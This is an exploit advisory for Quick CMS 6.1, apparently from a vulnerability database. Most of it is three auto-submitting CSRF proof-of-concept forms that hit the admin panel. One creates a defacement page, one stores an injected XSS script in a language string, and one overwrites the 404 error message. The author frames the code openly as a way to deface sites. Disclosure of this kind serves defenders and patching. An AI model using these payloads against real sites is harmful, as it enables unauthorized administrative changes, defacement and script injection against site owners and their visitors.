Quick CMS CSRF/XSS

2016.01.21
Credit: Amir.ght
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# -# Exploit Title : Quick CMS CSRF/XSS -# Vendor Homepage: http://opensolution.org -# Software Link: -# http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip -# Version : 6.1 -# Date: 2016-20-01 -# Tested On : Windows 7 / FireFox -# Discovered by : Amir.ght -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# -# Exploit For Create a Deface Page -# [Text] Is Your Deface Message -# Path Of page is : http://target.com/?(X) -# Exploit Code: <form name="addpage" method="POST" action="http://[URL]/admin.php?p=pages-form" /> <input type="hidden" name="sName" value="Title Of Page" /> <input type="hidden" name="sDescriptionFull" value="[Text]" /> <input type="hidden" name="iStatus" value="1" /> <input type="hidden" name="sUrl" value="(X)" /> <input type="hidden" name="iPosition" value="0" /> <input type="hidden" name="iMenu" value="1" /> <input type="hidden" name="iTheme" value="1" /> <input type="hidden" name="sOption" value="save" /> </form> <script language="javascript"> setTimeout('addpage.submit()',1); </script> -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# -# Exploit for XSS/Csrf : <form name="xss" method="POST" action="http://[URL]/admin.php?p=languages&sLangEdit=en" /> <input type="hidden" name="Pages" value="Pages<script>alert(/xss/)</script>" /> is Your js Code <input type="hidden" name="sOption" value="save" /> </form> <script language="javascript"> setTimeout('xss.submit()',1); </script> -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# -# Exploit for Edit Error 404 : <form name="notfound" method="POST" action="http://[URL]/admin.php?p=languages&sLangEdit=en" /> <input type="hidden" name="404_error" value="title+of+page" /> <input type="hidden" name="Data_not_found" value="deface+message" /> <input type="hidden" name="sOption" value="save" /> </form> <script language="javascript"> setTimeout('notfound.submit()',1); </script> ------------------------------------------ #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# #-# Exploit Author : Ashiyane Digital Security Team -#-# #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

References:

http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top